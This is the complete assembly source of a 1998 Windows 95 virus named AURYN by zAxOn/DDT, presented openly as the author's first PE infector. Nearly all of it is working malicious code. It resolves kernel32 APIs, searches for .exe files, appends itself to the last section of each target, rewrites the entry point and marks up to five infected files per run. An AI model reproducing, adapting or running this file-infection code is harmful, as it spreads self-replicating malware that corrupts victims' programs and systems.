; ; DDT first Win95 PE infector by zAxOn ; ; This is my first virus for win95, its a runtime that appends to PE ; expanding last section ; ; Thanx to Super, nigr0, VirusBuster, FRONTIS, and Lord Julus for ; his good tutorial about infect the PE ; ; 1998 zAxOn /DDT .386 .model flat extrn ExitProcess:PROC kernel32 equ 0BFF70000h llargaria_del_virus equ fi_dAURYN-AURYN+1000h GENERIC_LECT_ESCR equ 80000000h or 40000000h .data d dd ? .code AURYN: call delta delta: pop ebp sub ebp,offset delta jmp next datos: nom_del_virus db 'ViRUS AURYN bY zAxOn/DDT',0 Exe_Mask db '*.exe',0 Inici_de_les_APIS: GP db 'GetProcAddress',0 CrF db 'CreateFileA',0 FF db 'FindFirstFileA',0 FN db 'FindNextFileA',0 MV db 'MapViewOfFile',0 UM db 'UnmapViewOfFile',0 CA db 'CloseHandle',0 SF db 'SetFilePointer',0 SE db 'SetEndOfFile',0 GA db 'GetFileAttributesA',0 SA db 'SetFileAttributesA',0 CM db 'CreateFileMappingA',0 Fi_de_les_APIS: db 0ffh next: mov esi,kernel32 cmp word ptr [esi],'ZM' jne agur mov esi,[esi+3ch] add esi,kernel32 cmp word ptr [esi],'EP' jne agur pushad mov esi,[esi+78h] add esi,kernel32 mov exportar+ebp,esi add esi,10h lodsd mov base+ebp,eax lodsd lodsd mov limite+ebp,eax add eax,kernel32 lodsd add eax,kernel32 mov funciones+ebp,eax lodsd add eax,kernel32 mov nombres+ebp,eax lodsd add eax,kernel32 mov ordinales+ebp,eax mov esi,funciones+ebp lodsd add eax,kernel32 mov esi,nombres+ebp mov indice+ebp,esi mov edi,[esi] add edi,kernel32 xor ecx,ecx lea ebx,[ebp+offset GP] Inici_recerca: mov esi,ebx Trobar_byte: cmpsb jne seguent cmp byte ptr [edi],0 je la_tenim jmp Trobar_byte seguent: inc cx cmp cx,word ptr [limite+ebp] jae agur add dword ptr [indice+ebp],4 mov esi,indice+ebp mov edi,[esi] add edi,kernel32 jmp Inici_recerca la_tenim: mov ebx,esi inc ebx shl ecx,1 mov esi,ordinales+ebp add esi,ecx xor eax,eax mov ax,word ptr [esi] shl eax,2 mov esi,funciones+ebp add esi,eax mov edi,[esi] add edi,kernel32 mov [GetProc+ebp],edi popad lea esi,[offset CrF+ebp] lea edi,[offset Create+ebp] Trobar_Apis: push esi push kernel32 call [GetProc+ebp] or eax,eax je agur stosd Tornar_a_vore: inc esi cmp byte ptr [esi],0 jne Tornar_a_vore inc esi push edi lea edi,[offset Fi_de_les_APIS+ebp] cmp esi,edi pop edi jne Trobar_Apis call Ara_o_Mai or ebp,ebp je agur agur: mov eax,antiga_ip+ebp add eax,00400000h jmp eax Ara_o_Mai: lea edi,[offset Dades+ebp] lea eax,[offset Dades+ebp] push eax lea eax,[offset Exe_Mask+ebp] push eax call [FindF+ebp] or eax,eax je se_na_nem mov Handle_S+ebp,eax lea esi,[Dades+ebp+2ch] mov ofs_arch+ebp,esi call Obrir_i_treballar bucle: push edi push [Handle_S+ebp] call [FindN+ebp] or eax,eax je se_na_nem lea esi,[Dades+ebp+2ch] mov ofs_arch+ebp,esi call Obrir_i_treballar cmp contador+ebp,5 jne bucle se_na_nem: ret Obrir_i_treballar: pushad lea ecx,[Dades+ebp+20h] mov ecx,[ecx] add ecx,llargaria_del_virus mov memoria+ebp,ecx push esi call [GetFileAtrib+ebp] or eax,eax je passant mov atributs+ebp,eax passant: push 080h push esi call [SetFileAtrib+ebp] push 0 push 0 push 3 push 0 push 1 push GENERIC_LECT_ESCR push esi call [Create+ebp] mov Handle_F+ebp,eax push 0 push [memoria+ebp] push 0 push 4 push 0 push [Handle_F+ebp] call [CreateFileMap+ebp] or eax,eax je tancar_f mov Handle_M+ebp,eax push [memoria+ebp] push 0 push 0 push 2 push eax call [MapView+ebp] or eax,eax je tancar_map mov esi,eax mov direccio_map+ebp,esi cmp word ptr [esi],'ZM' jne tanquem_map_v cmp word ptr [esi+38h],'Xt' jne gorigori jmp tanquem_map_v gorigori: mov edi,[esi+3ch] cmp word ptr [esi+edi],'EP' jne tanquem_map_v add esi,edi mov cap_PE+ebp,esi mov eax,[esi+28h] mov antiga_ip+ebp,eax mov eax,[esi+3ch] mov alineacio+ebp,eax mov ebx,[esi+74h] shl ebx,3 xor eax,eax mov ax,word ptr [esi+6h] dec eax mov ecx,28h mul ecx add esi,78h add esi,ebx add esi,eax or [esi+24h],0A0000020h mov eax,[esi+10h] mov vella_raw_l+ebp,eax add [esi+8h],llargaria_del_virus-1000h mov eax, [esi+8h] mov ecx,alineacio+ebp div ecx mov ecx,alineacio+ebp sub ecx,edx mov [esi+10h],ecx mov eax,[esi+8h] add eax,[esi+10h] mov [esi+10h],eax mov nova_raw_l+ebp,eax mov eax,[esi+0ch] add eax,[esi+8h] sub eax,llargaria_del_virus-1000h mov nova_ip+ebp,eax mov eax,vella_raw_l+ebp mov ebx,nova_raw_l+ebp sub ebx,eax mov increment+ebp,eax mov eax,[esi+14h] add eax,nova_raw_l+ebp mov nova_llargaria+ebp,eax mov eax,[esi+14h] add eax,[esi+8h] sub eax,llargaria_del_virus-1000h add eax,direccio_map+ebp mov edi,eax lea esi,[offset AURYN+ebp] mov ecx,llargaria_del_virus-1000h rep movsb mov esi,cap_PE+ebp mov eax,nova_ip+ebp mov [esi+28h],eax mov eax,increment+ebp add [esi+50h],eax mov esi,direccio_map+ebp mov [esi+38h],'Xt' inc [contador+ebp] tanquem_map_v: push [direccio_map+ebp] call [UnMap+ebp] tancar_map: push [Handle_M+ebp] call [CloseH+ebp] tancar_f: mov eax,[Handle_F+ebp] push 0 push 0 push [nova_llargaria+ebp] push eax call [SetFileP+ebp] push eax call [SetEnd+ebp] push eax call [CloseH+ebp] push [atributs+ebp] push [ofs_arch+ebp] call [SetFileAtrib+ebp] popad ret fi_dAURYN: exportar dd ? base dd ? limite dd ? funciones dd ? nombres dd ? ordinales dd ? indice dd ? nova_llargaria dd ? atributs dd ? Handle_S dd ? Handle_F dd ? Handle_M dd ? antiga_ip dd ? nova_ip dd ? nova_raw_l dd ? vella_raw_l dd ? cap_PE dd ? increment dd ? alineacio dd ? memoria dd ? ofs_arch dd ? direccio_map dd ? contador db 0 GetProc dd ? Create dd ? FindF dd ? FindN dd ? MapView dd ? UnMap dd ? CloseH dd ? SetFileP dd ? SetEnd dd ? GetFileAtrib dd ? SetFileAtrib dd ? CreateFileMap dd ? Dades db 13ah dup (?) end AURYN